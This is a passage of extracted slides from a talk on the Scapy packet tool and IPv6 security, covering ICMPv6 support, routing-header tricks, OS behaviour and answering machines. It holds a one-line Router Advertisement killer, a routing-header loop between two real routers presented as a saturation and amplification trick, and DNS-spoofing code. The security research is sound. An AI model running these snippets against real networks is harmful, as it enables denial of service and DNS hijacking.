fe80::20a:5eff:fe00:1349 : [’assam.ipv6.test.lab.’]
fe80::20a:4aff:fe3d:4c27 : [’lotus.ipv6.test.lab.’]
fe80::20a:6cff:fe27:1c49 : [’yunnan.ipv6.test.lab.’]
fe80::20a:5bff:fe20:1d5a : [’darjeeling.ipv6.test.lab.’]
The one line Router Advertisement daemon killer>>> send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)
P. Biondi / A. Ebalard Scapy and IPv6 networking 70/100
![Page 136: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/136.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 71/100
![Page 137: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/137.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
ICMPv6 SupportICMPv6 was promoted (1/2)
ICMPv6 <TAB> <TAB>
ICMPv6EchoRequest ICMPv6ND INDAdv /* Inverse Neighbor Discovery */ICMPv6EchoReply ICMPv6ND INDSol
ICMPv6DestUnreach ICMPv6NDOptHAInfo /* Mobile IPv6 */ICMPv6ParamProblem ICMPv6NDOptMTU /* Link MTU in RA */ICMPv6TimeExceeded ICMPv6NDOptPrefixInfo /* Main RA content */ICMPv6PacketTooBig ICMPv6NDOptRedirectedHdr
ICMPv6NDOptSrcAddrListICMPv6ND RS ICMPv6NDOptSrcLLAddr /* L2 Addr in RS/NS */ICMPv6ND RA ICMPv6NDOptTgtAddrList /* L2 Addr in NS */ICMPv6ND NS ICMPv6NDOptDstLLAddrICMPv6ND NA ICMPv6NDOptAdvIntervalICMPv6ND Redirect ICMPv6NDOptUnknown /* Generic fallback */
P. Biondi / A. Ebalard Scapy and IPv6 networking 72/100
![Page 138: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/138.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
ICMPv6 SupportICMPv6 was promoted (2/2)
ICMPv6 <TAB> <TAB>
ICMPv6HAADReply /* Mobile IPv6 */ ICMPv6NIQueryICMPv6HAADRequest ICMPv6NIQueryIPv4ICMPv6MPAdv ICMPv6NIQueryIPv6ICMPv6MPSol ICMPv6NIQueryLocal
ICMPv6NIQueryNameICMPv6MLDone /* Multicast Listener Discovery */ ICMPv6NIReplyICMPv6MLQuery ICMPv6NIReplyRefuseICMPv6MLReport ICMPv6NIReplySuccess
ICMPv6NIReplySuccessIPv4ICMPv6MRD Advertisement ICMPv6NIReplySuccessIPv6ICMPv6MRD Solicitation ICMPv6NIReplySuccessNameICMPv6MRD Termination ICMPv6NIReplyUnknown
P. Biondi / A. Ebalard Scapy and IPv6 networking 73/100
![Page 139: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/139.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 74/100
![Page 140: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/140.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Basic Routing Header example
What’s inside
1 c l a s s IPv6OptionHeaderRouting ( IPv6OptionHeader ) :2 name = "IPv6 Option Header Routing"
3 f i e l d s d e s c = [ ByteEnumField ( "nh" , 59 , ipv6nh ) ,4 ByteF i e l d ( "len" , None ) ,5 ByteF i e l d ( "type" , 0 ) ,6 ByteF i e l d ( "segleft" , None ) ,7 B i t F i e l d ( "reserved" , 0 , 32) ,8 IP6Rout ingHeade rL i s tF i e l d ( "addresses" , [ ] ) ]9 o v e r l o a d f i e l d s = { IPv6 : { "nh" : 43 }}
sr1() Example
>>> a = sr1(IPv6(dst="2001:4f8:4:7:2e0:81ff:fe52:9a6b")/ \IPv6OptionHeaderRouting(addresses=["2001:78:1:32::1", "2001:20:82:203:fea5:385"])/ \ICMPv6EchoRequest(data=RandString(7)), verbose=0)
>>> a.src
"2001:20:82:203:fea5:385"
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 75/100
![Page 141: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/141.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Remote and boomerang traceroute
>>> waypoint = "2001:301:0:8002:203:47ff:fea5:3085"
>>> target = "2001:5f9:4:7:2e0:81ff:fe52:9a6b"
>>> traceroute6(waypoint, minttl=15 , maxttl=34, \l4=IPv6OptionHeaderRouting(addresses=[target])/ \ICMPv6EchoRequest(data=RandString(7)))
2001:301:0:8002:203:47ff:fea5:3085 :IER
15 2001:319:2000:5000::92 3
16 2001:301:0:1c04:230:13ff:feae:5b 3
17 2001:301:0:4800::7800:1 3
18 2001:301:0:8002:203:47ff:fea5:3085 3
19 2001:301:0:2::6800:1 3
20 2001:301:0:1c04:20e:39ff:fee3:3400 3
21 2001:301:133::1dec:0 3
22 2001:301:901:7::18 3
23 2001:301:0:1800::2914:1 3
24 2001:319:2000:3002::21 3
25 2001:319:0:6000::19 3
26 2001:319:0:2000::cd 3
27 2001:519:0:2000::196 3
28 2001:519:0:5000::1e 3
29 2001:5f9:0:1::3:2 3
30 2001:5f9:0:1::5:2 3
31 2001:5f9:0:1::f:1 3
32 2001:5f9:0:1::14:2 3
33 2001:5f9:4:7:2e0:81ff:fe52:9a6b 129
34 2001:5f9:4:7:2e0:81ff:fe52:9a6b 129
(<Traceroute: ICMP:0 UDP:0 TCP:0 Other:20>,
<Unanswered: ICMP:0 UDP:0 TCP:0 Other:0>)
T a r g e t
S o u r c e I P v 6 r o u t e rN a t u r a l p a t hF o r c e d p a t h ( u s i n g R H 0 )W a y p o i n t
P. Biondi / A. Ebalard Scapy and IPv6 networking 76/100
![Page 142: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/142.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Funny gameRules of the game
Goal
Keep an IPv6 packet as long as possible in IPv6 Internet routinginfrastructure.
Rules
No L4 help : only IPv6 L3 infrastructure hijacking
No cheating : explicit tunnels are banned (2002::/16, . . . )
No abuse : it’s only a game !!
Clue
It’s based on Routing Header mechanism . . .
P. Biondi / A. Ebalard Scapy and IPv6 networking 77/100
![Page 143: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/143.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Funny gameSolution
Current high score>>> addr1 = ’2001:4830:ff:12ea::2’
>>> addr2 = ’2001:360:1:10::2’
>>> zz=time.time(); \a=sr1(IPv6(dst=addr2, hlim=255)/ \IPv6OptionHeaderRouting(addresses=[addr1, addr2]*43)/ \ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80); \print "%.2f seconds" % (time.time() - zz)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 78/100
![Page 144: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/144.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Funny gameSolution
Current high score>>> addr1 = ’2001:4830:ff:12ea::2’
>>> addr2 = ’2001:360:1:10::2’
>>> zz=time.time(); \a=sr1(IPv6(dst=addr2, hlim=255)/ \IPv6OptionHeaderRouting(addresses=[addr1, addr2]*43)/ \ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80); \print "%.2f seconds" % (time.time() - zz)
32.29 seconds
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 78/100
![Page 145: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/145.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Funny gameSolution
Current high score>>> addr1 = ’2001:4830:ff:12ea::2’
>>> addr2 = ’2001:360:1:10::2’
>>> zz=time.time(); \a=sr1(IPv6(dst=addr2, hlim=255)/ \IPv6OptionHeaderRouting(addresses=[addr1, addr2]*43)/ \ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80); \print "%.2f seconds" % (time.time() - zz)
32.29 seconds
>>>
Link saturation / Amplification effect
100 KBytes/s upload bandwidth,
32 seconds storage between the 2 routers
=⇒ 1.6 MBytes/sec of traffic in both directions on the link
P. Biondi / A. Ebalard Scapy and IPv6 networking 78/100
![Page 146: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/146.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 79/100
![Page 147: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/147.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Routing Header processing
OS Host Router Firewallable Deactivable
Linux 2.6 dropped routed not reliably no
FreeBSD 6.1 routed routed not reliably noMac OS X routed routed no no
OpenBSD 3.8 routed routed no no
XP SP2 dropped - - -Vista dropped - - -
Cisco IOS - routed not reliably yesJuniper - routed no no
P. Biondi / A. Ebalard Scapy and IPv6 networking 80/100
![Page 148: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/148.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
In the pipeIKEv2 and Teredo
Teredo
External extension for Scapy6
Most of the work already done (70%)
Waiting for 2001::/32 prefix to be propagated
Expected with/before Windows R© VistaTM
release
IKEv2
Challenging extension on many aspects
A playground for state and crypto support in Scapy
Expected before a stable Racoon2 release ;-)
P. Biondi / A. Ebalard Scapy and IPv6 networking 81/100
![Page 149: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/149.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
3D visualization/interactionsA picture is worth a thousand words
P. Biondi / A. Ebalard Scapy and IPv6 networking 82/100
![Page 150: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/150.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Conclusion
IPv6 is coming, with a lot of things to look at.
It’s both . . .
. . . simple (design)
. . . complicated (extensions, transition mechanisms)
It’s like no one learned from IPv4 problems. Implementors aredoing the same mistakes again (source routing)
We need tools to tests stacks and products
Turning ideas into PoC is a question of seconds with Scapy6
P. Biondi / A. Ebalard Scapy and IPv6 networking 83/100
![Page 151: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/151.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
The End
That’s all folks! Thanks for your attention.
You can reach us at:
{
Useful links:
Scapy: http://www.secdev.org/projects/scapy
Scapy6: http://namabiiru.hongo.wide.ad.jp/scapy6
UTscapy: http://www.secdev.org/projects/UTscapy
These slides: http://www.secdev.org/
P. Biondi / A. Ebalard Scapy and IPv6 networking 84/100
![Page 152: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/152.jpg)
ReferencesAdditionnal material
zoomed frames
Appendices
6 References
7 Additionnal materialLearning Python in 2 slidesAnswering machines
8 zoomed frames
P. Biondi / A. Ebalard Scapy and IPv6 networking 85/100
![Page 153: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/153.jpg)
ReferencesAdditionnal material
zoomed frames
References I
P. Biondi, Scapyhttp://www.secdev.org/projects/scapy/
Ed3f, 2002, Firewall spotting with broken CRC, Phrack 60http://www.phrack.org/phrack/60/p60-0x0c.txt
Ofir Arkin and Josh Anderson, Etherleak: Ethernet framepadding information leakage,http://www.atstake.com/research/advisories/2003/atstake etherleak report.pdf
P. Biondi, 2002 Linux Netfilter NAT/ICMP code informationleakhttp://www.netfilter.org/security/2002-04-02-icmp-dnat.html
P. Biondi / A. Ebalard Scapy and IPv6 networking 86/100
![Page 154: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/154.jpg)
ReferencesAdditionnal material
zoomed frames
References II
P. Biondi, 2003 Linux 2.0 remote info leak from too big icmpcitationhttp://www.secdev.org/adv/CARTSA-20030314-icmpleak
P. Biondi / A. Ebalard Scapy and IPv6 networking 87/100
![Page 155: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/155.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Outline
6 References
7 Additionnal materialLearning Python in 2 slidesAnswering machines
8 zoomed frames
P. Biondi / A. Ebalard Scapy and IPv6 networking 88/100
![Page 156: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/156.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Learning Python in 2 slides (1/2)
This is an int (signed, 32bits) : 42
This is a long (signed, infinite): 42L
This is a str : "bell\x07\n" or ’bell\x07\n’ (" ⇐⇒ ’)
This is a tuple (immutable): (1,4, "42")
This is a list (mutable): [4,2, "1"]
This is a dict (mutable): { "one":1 , "two":2 }
P. Biondi / A. Ebalard Scapy and IPv6 networking 89/100
![Page 157: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/157.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Learning Python in 2 slides (2/2)
No block delimiters. Indentation does matter.
if cond1:
instr
instr
elif cond2:
instr
else:
instr
while cond:
instr
instr
try:
instr
except exception:
instr
else:
instr
def fact(x):
if x == 0:
return 1
else:
return x*fact(x-1)
for var in set:
instr
lambda x,y: x+y
P. Biondi / A. Ebalard Scapy and IPv6 networking 90/100
![Page 158: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/158.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Outline
6 References
7 Additionnal materialLearning Python in 2 slidesAnswering machines
8 zoomed frames
P. Biondi / A. Ebalard Scapy and IPv6 networking 91/100
![Page 159: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/159.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Answering machines
An answering machine enables you to quickly design astimulus/response daemon
Already implemented: fake DNS server, ARP spoofer, DHCPdaemon, FakeARPd, Airpwn clone
Interface description
1 c l a s s Demo am( AnsweringMachine ) :2 funct ion name = "demo"
3 f i l t e r = "a bpf filter if needed"
4 def p a r s e op t i o n s ( s e l f , . . . ) :5 . . . .6 def i s r e q u e s t ( s e l f , req ) :7 # return 1 if req is a request
8 def make rep ly ( s e l f , req ) :9 # return the reply for req
P. Biondi / A. Ebalard Scapy and IPv6 networking 92/100
![Page 160: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/160.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Answering machinesUsing answering machines
The class must be instanciated
The parameters given to the constructor become defaultparameters
The instance is a callable object whose default parameters canbe overloaded
Once called, the instance loops, sniffs and answers stimuli
Side note:
Answering machine classes declaration automatically creates afunction, whose name is taken in the function name classattribute, that instantiates and runs the answering machine.This is done thanks to the ReferenceAM metaclass.
P. Biondi / A. Ebalard Scapy and IPv6 networking 93/100
![Page 161: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/161.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Answering machinesDNS spoofing example
1 c l a s s DNS am( AnsweringMachine ) :2 funct ion name="dns_spoof"
3 f i l t e r = "udp port 53"
45 def p a r s e op t i o n s ( s e l f , j o k e r="192.168.1.1" , zone=None ) :6 i f zone i s None :7 zone = {}8 s e l f . zone = zone
9 s e l f . j o k e r=j o k e r
1011 def i s r e q u e s t ( s e l f , req ) :12 r e t u r n req . ha s l a y e r (DNS) and req . g e t l a y e r (DNS) . qr == 01314 def make rep ly ( s e l f , req ) :15 i p = req . g e t l a y e r ( IP )16 dns = req . g e t l a y e r (DNS)17 r e sp = IP ( dst=i p . s rc , s r c=i p . dst )/UDP( dport=i p . sport , spo r t=18 rdata = s e l f . zone . get ( dns . qd . qname , s e l f . j o k e r )19 r e sp /= DNS( i d=dns . id , qr=1, qd=dns . qd ,20 an=DNSRR( rrname=dns . qd . qname , t t l =10, rdata=rd
21 r e t u r n re spP. Biondi / A. Ebalard Scapy and IPv6 networking 94/100
![Page 162: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/162.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.apple.com
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 95/100
![Page 163: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/163.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.cisco.com
0
2
4
6
8
10
12
14
16
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 96/100
![Page 164: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/164.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.google.com
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 97/100
![Page 165: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/165.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.microsoft.com
28200
28400
28600
28800
29000
29200
29400
29600
29800
30000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 98/100
![Page 166: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/166.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.yahoo.fr
0
10000
20000
30000
40000
50000
60000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 99/100
![Page 167: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/167.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.kernel.org
-1
-0.5
0
0.5
1
0 100 200 300 400 500 600 700 800
P. Biondi / A. Ebalard Scapy and IPv6 networking 100/100